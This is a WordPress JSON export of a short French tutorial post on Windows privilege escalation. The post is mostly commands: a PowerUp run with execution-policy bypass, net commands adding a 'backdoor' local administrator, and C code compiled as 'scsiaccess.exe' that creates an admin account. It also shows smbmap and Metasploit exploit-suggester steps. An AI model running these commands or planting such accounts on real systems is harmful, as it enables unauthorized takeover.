{"id":120,"date":"2021-05-23T12:10:22","date_gmt":"2021-05-23T17:10:22","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=120"},"modified":"2021-05-27T21:20:26","modified_gmt":"2021-05-28T02:20:26","slug":"escalade-de-privileges-sous-windows","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/","title":{"rendered":"Escalade de privil\u00e8ges sous Windows"},"content":{"rendered":"

PowerSploit<\/a><\/p>\n

Pour trouver des services exploitables ou des DLL ou des cl\u00e9s de registre qui peuvent \u00eatre exploit\u00e9s
\n

# powershell.exe -nop -exec bypass\n# import-module .\\powerup.ps1\n# Invoke-AllChecks<\/code><\/pre><\/p>\n
Autres outils pour trouver des exploits pour \u00e9lever vos droits et avoir davantage de privil\u00e8ges:
\nWindows Exploit Suggester New Generation (wesng)<\/a> <\/p>\n
Ajouter un administrateur local
\n
# net user backdoor motdepasse\n# net localgroup Administrators backdoor \/add<\/code><\/pre><\/p>\n
Code langage C pour ajouter un utilisateur
\n
\n#i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c\n#include <stdlib.h> \/* system, NULL, EXIT_FAILURE *\/  \nint main ()  \n{  \n    int i;\n    system("net user hacker Hacker123! \/add");\n    system("net localgroup administrators hacker \/add");  \n    return 0;  \n}\n<\/code><\/pre><\/p>\n
Scan de partage r\u00e9seau
\n# smbmap --host-file smbhosts.txt -u Administrator -p PasswordOrHash<\/code><\/p>\n
Pour trouver des exploits avec metasploit, il faut d’abord upgrader la session en meterpreter. Pour se faire, nous mettons la session en background avec ctrl+z. Avec “sessions”, nous obtenons l’identifiant associ\u00e9 \u00e0 la session. Par la suite, sessions -u id.Une nouvelle session sera cr\u00e9e. Par la suite, nous pouvons faire \u00e0 nouveau un listing des sessions avec “sessions”. Par la suite, nous pouvons utiliser le module local_exploit_suggester et r\u00e9gler le param\u00e8tre session avant de faire la recherche d’exploits.<\/p>\n
use post\/multi\/recon\/local_exploit_suggester\nset session 2\nrun\n<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"
PowerSploit Pour trouver des services exploitables ou des DLL ou des cl\u00e9s de registre qui peuvent \u00eatre exploit\u00e9s # powershell.exe -nop -exec bypass # import-module .\\powerup.ps1 # Invoke-AllChecks Autres outils pour trouver des exploits pour \u00e9lever vos droits et avoir davantage de privil\u00e8ges: Windows Exploit Suggester New Generation (wesng) Ajouter un administrateur local # net user backdoor motdepasse # net localgroup Administrators backdoor \/add Code langage C pour ajouter un utilisateur #i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c #include <stdlib.h> \/* system, NULL, EXIT_FAILURE *\/   int main ()   {       int i;     system("net user hacker Hacker123! \/add");     system("net localgroup administrators hacker \/add");       return 0;   <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15],"tags":[],"yoast_head":"\nEscalade de privil\u00e8ges sous Windows - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Escalade de privil\u00e8ges sous Windows - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"PowerSploit Pour trouver des services exploitables ou des DLL ou des cl\u00e9s de registre qui peuvent \u00eatre exploit\u00e9s # powershell.exe -nop -exec bypass # import-module .powerup.ps1 # Invoke-AllChecks Autres outils pour trouver des exploits pour \u00e9lever vos droits et avoir davantage de privil\u00e8ges: Windows Exploit Suggester New Generation (wesng) Ajouter un administrateur local # net user backdoor motdepasse # net localgroup Administrators backdoor \/add Code langage C pour ajouter un utilisateur #i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c #include <stdlib.h> \/* system, NULL, EXIT_FAILURE *\/   int main ()   {       int i;     system("net user hacker Hacker123! \/add");     system("net localgroup administrators hacker \/add");       return 0;  \" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-23T17:10:22+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-05-28T02:20:26+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/\",\"name\":\"Escalade de privil\u00e8ges sous Windows - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-05-23T17:10:22+00:00\",\"dateModified\":\"2021-05-28T02:20:26+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Escalade de privil\u00e8ges sous Windows\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Escalade de privil\u00e8ges sous Windows - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/","og_locale":"fr_CA","og_type":"article","og_title":"Escalade de privil\u00e8ges sous Windows - S\u00e9curiser votre site","og_description":"PowerSploit Pour trouver des services exploitables ou des DLL ou des cl\u00e9s de registre qui peuvent \u00eatre exploit\u00e9s # powershell.exe -nop -exec bypass # import-module .powerup.ps1 # Invoke-AllChecks Autres outils pour trouver des exploits pour \u00e9lever vos droits et avoir davantage de privil\u00e8ges: Windows Exploit Suggester New Generation (wesng) Ajouter un administrateur local # net user backdoor motdepasse # net localgroup Administrators backdoor \/add Code langage C pour ajouter un utilisateur #i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c #include <stdlib.h> \/* system, NULL, EXIT_FAILURE *\/   int main ()   {       int i;     system("net user hacker Hacker123! \/add");     system("net localgroup administrators hacker \/add");       return 0;  ","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-05-23T17:10:22+00:00","article_modified_time":"2021-05-28T02:20:26+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/","name":"Escalade de privil\u00e8ges sous Windows - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-05-23T17:10:22+00:00","dateModified":"2021-05-28T02:20:26+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/escalade-de-privileges-sous-windows\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Escalade de privil\u00e8ges sous Windows"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/120"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=120"}],"version-history":[{"count":7,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/120\/revisions"}],"predecessor-version":[{"id":277,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/120\/revisions\/277"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}